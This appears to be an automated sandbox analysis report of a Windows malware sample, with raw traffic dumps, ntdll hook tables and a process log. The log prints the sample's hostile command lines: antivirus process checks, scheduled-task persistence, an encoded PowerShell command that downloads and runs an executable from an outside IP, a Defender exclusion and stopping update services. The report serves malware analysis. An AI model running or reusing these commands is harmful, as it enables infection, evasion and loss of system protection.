                                  Jul 26, 2024 23:14:22.752825975 CEST1236INData Raw: 04 00 00 48 c7 44 24 20 00 00 00 00 48 8b 08 48 83 c9 02 e8 cc 14 01 00 8b cb e8 a1 1c 01 00 48 89 44 24 28 4c 8d 8c 24 30 04 00 00 4c 8d 05 6d 94 02 00 48 89 7c 24 20 ba 00 04 00 00 48 8d 4c 24 30 e8 e9 f3 ff ff 41 b8 00 04 00 00 48 8d 94 24 30
                                  Data Ascii: HD$ HHHD$(L$0LmH|$ HL$0AH$0HL$0^3A0HtLH$0LHT$0{H$0H3H@_^[LIKISMCMK SWHHHH3H$0HI{H|$(HT$
                                  Jul 26, 2024 23:14:22.753138065 CEST1236INData Raw: 05 cf 10 04 00 49 8b cf ff 15 be 87 02 00 48 8b 05 bf 10 04 00 48 8b cd ff 15 ae 87 02 00 48 8b 6c 24 60 48 8b 05 aa 10 04 00 49 8b cc ff 15 99 87 02 00 4c 8b 64 24 68 48 8b 05 95 10 04 00 49 8b cd ff 15 84 87 02 00 48 8b 5c 24 70 49 8b c6 48 83
                                  Data Ascii: IHHHl$`HILd$hHIH\$pIH0A_A^A]_^@VAUAWp`H+H&H3H$PH LHHkLHuHfHIL$hLHuHP
                                  Jul 26, 2024 23:14:22.753154039 CEST1236INData Raw: 89 bc 24 e0 30 00 00 90 0f b6 4f 11 8d 41 a6 a8 f7 74 17 80 f9 64 0f 84 02 01 00 00 80 f9 6e 74 09 80 f9 78 0f 85 3a 01 00 00 48 8d 77 12 85 db 0f 85 83 01 00 00 48 8b 8d 18 20 00 00 48 85 c9 74 08 48 8b d6 e8 1e 3c 00 00 48 89 74 24 28 4c 8d 8d
                                  Data Ascii: $0OAtdntx:HwH HtH<Ht$(L" LD$ \H$=(H$u>H HtH6H$D810H6LH" HBduYH
                                  Jul 26, 2024 23:14:22.753170967 CEST1236INData Raw: 8b cf e8 9d e2 ff ff 48 8b d8 49 3b 87 10 10 00 00 0f 82 74 ff ff ff 48 8d 0d 86 88 02 00 e8 b1 47 00 00 4c 8b bc 24 a8 20 00 00 4c 8b c0 48 85 c0 74 26 0f b6 10 83 ea 30 75 0b 0f b6 50 01 33 c0 0f b6 c8 2b d1 85 d2 49 8b c8 0f 95 c0 88 87 31 30
                                  Data Ascii: HI;tHGL$ LHt&0uP3+I10 HWbGHKHHHI;@H" ! LLE=HH$ H$ H$` H3FHp
                                  Jul 26, 2024 23:14:22.758107901 CEST1236INData Raw: ff ff ff 0f 48 c1 3d 00 10 00 00 7c 0a 8b c1 48 83 c4 30 5f 5e 5b c3 48 8b cf e8 e1 03 00 00 48 83 c4 30 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 56 b8 60 40 00 00 e8 1f 80 00 00 48 2b e0 48 8b 05 e5 a4 03 00 48 33 c4 48 89 84 24
                                  Data Ascii: H=|H0_^[HH0_^[@SUVWAV`@H+HH3H$P@L$@HHQHH$PIIHH$P0HH0L$PH$P A\Ht/Hl$@HDL$8HD$0H$P0DL$(HD$ &Hl$0H$P0D$(\H


                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function NameHook TypeActive in Processes
                                  ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                  NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                  ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                  NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                  ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                  NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                  NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                  ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                  ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                  NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                  RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                  NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                  NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                  ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                  ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                  Processes

                                  Process: explorer.exe, Module: ntdll.dll
                                  Function NameHook TypeNew Data
                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                  Process: winlogon.exe, Module: ntdll.dll
                                  Function NameHook TypeNew Data
                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:17:13:50
                                  Start date:26/07/2024
                                  Path:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\hfi47s4wOT.exe"
                                  Imagebase:0x400000
                                  File size:749'755 bytes
                                  MD5 hash:B74B4DC696DAA20DCCD7F743C8C1E1A2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:17:13:52
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /k move Returning Returning.cmd & Returning.cmd & exit
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:17:13:52
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:17:13:53
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                  Wow64 process (32bit):true
                                  Commandline:tasklist
                                  Imagebase:0x9d0000
                                  File size:79'360 bytes
                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:17:13:53
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\findstr.exe
                                  Wow64 process (32bit):true
                                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                                  Imagebase:0xde0000
                                  File size:29'696 bytes
                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:17:13:53
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                  Wow64 process (32bit):true
                                  Commandline:tasklist
                                  Imagebase:0x9d0000
                                  File size:79'360 bytes
                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:17:13:53
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\findstr.exe
                                  Wow64 process (32bit):true
                                  Commandline:findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                  Imagebase:0xde0000
                                  File size:29'696 bytes
                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:17:13:54
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd /c md 287175
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:17:13:54
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\findstr.exe
                                  Wow64 process (32bit):true
                                  Commandline:findstr /V "COALITIONFIBERRELPASTE" Gays
                                  Imagebase:0xde0000
                                  File size:29'696 bytes
                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:17:13:54
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd /c copy /b Yoga + Sail 287175\B
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:17:13:54
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\287175\Surrey.pif
                                  Wow64 process (32bit):true
                                  Commandline:Surrey.pif B
                                  Imagebase:0x680000
                                  File size:946'784 bytes
                                  MD5 hash:848164D084384C49937F99D5B894253E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:11
                                  Start time:17:13:54
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\choice.exe
                                  Wow64 process (32bit):true
                                  Commandline:choice /d y /t 15
                                  Imagebase:0x480000
                                  File size:28'160 bytes
                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:17:13:55
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:cmd /c schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:17:13:55
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:17:13:55
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks.exe /create /tn "Webster" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
                                  Imagebase:0x720000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:15
                                  Start time:17:13:55
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:schtasks.exe /create /tn "MindZenithPro" /tr "wscript //B 'C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js'" /sc onlogon /F /RL HIGHEST
                                  Imagebase:0x720000
                                  File size:187'904 bytes
                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:16
                                  Start time:17:13:55
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:17
                                  Start time:17:13:57
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
                                  Imagebase:0x7ff669d70000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:17:13:57
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
                                  Imagebase:0x7ff669d70000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:17:13:57
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
                                  Imagebase:0x3c0000
                                  File size:946'784 bytes
                                  MD5 hash:848164D084384C49937F99D5B894253E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Has exited:true

                                  General

                                  Target ID:20
                                  Start time:17:13:57
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif" "C:\Users\user\AppData\Local\MindZenith Innovations Co\g"
                                  Imagebase:0x3c0000
                                  File size:946'784 bytes
                                  MD5 hash:848164D084384C49937F99D5B894253E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:22
                                  Start time:17:14:14
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
                                  Imagebase:0x4d0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Has exited:true

                                  General

                                  Target ID:25
                                  Start time:17:14:19
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
                                  Imagebase:0xec0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:26
                                  Start time:17:14:19
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:29
                                  Start time:17:15:19
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe
                                  Imagebase:0x2c0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:30
                                  Start time:17:15:23
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\Update.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\Update.exe"
                                  Imagebase:0x7ff6d6100000
                                  File size:86'679'705 bytes
                                  MD5 hash:83D24C959DB31E8275643ED7DE230825
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 3%, ReversingLabs
                                  Has exited:false

                                  General

                                  Target ID:31
                                  Start time:17:15:25
                                  Start date:26/07/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA1ADEALgA3ADcALgAxADQAMAAuADcANAAvAHAAYQBnAGUAcwAvAFUAcABkAGEAdABlAC4AZQB4AGUAJwAsACAAPAAjAG0AaAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZAB2AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegByAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAKQA8ACMAYgBlAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBqAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAbABuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAC4AZQB4AGUAJwApADwAIwBrAGMAbgAjAD4A"
                                  Imagebase:0xec0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:32
                                  Start time:17:15:25
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:33
                                  Start time:17:15:26
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\Update.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\Update.exe"
                                  Imagebase:0x7ff6d6100000
                                  File size:86'679'705 bytes
                                  MD5 hash:83D24C959DB31E8275643ED7DE230825
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:34
                                  Start time:17:15:26
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\Update.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\Update.exe"
                                  Imagebase:0x7ff6d6100000
                                  File size:86'679'705 bytes
                                  MD5 hash:83D24C959DB31E8275643ED7DE230825
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:35
                                  Start time:17:15:28
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\Update.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\Update.exe"
                                  Imagebase:0x7ff6d6100000
                                  File size:86'679'705 bytes
                                  MD5 hash:83D24C959DB31E8275643ED7DE230825
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:36
                                  Start time:17:15:32
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exe"
                                  Imagebase:0x7ff641370000
                                  File size:59'428'352 bytes
                                  MD5 hash:C84101CF9E883A329337A3BA6BC74733
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:37
                                  Start time:17:15:33
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:38
                                  Start time:17:15:33
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:39
                                  Start time:17:15:35
                                  Start date:26/07/2024
                                  Path:C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Users\user\AppData\Local\Temp\tmpgtnhdrk0.exe"
                                  Imagebase:0x7ff700810000
                                  File size:59'428'352 bytes
                                  MD5 hash:C84101CF9E883A329337A3BA6BC74733
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:40
                                  Start time:17:15:35
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:41
                                  Start time:17:15:35
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  General

                                  Target ID:43
                                  Start time:17:15:37
                                  Start date:26/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Imagebase:0x7ff7ca360000
                                  File size:289'792 bytes
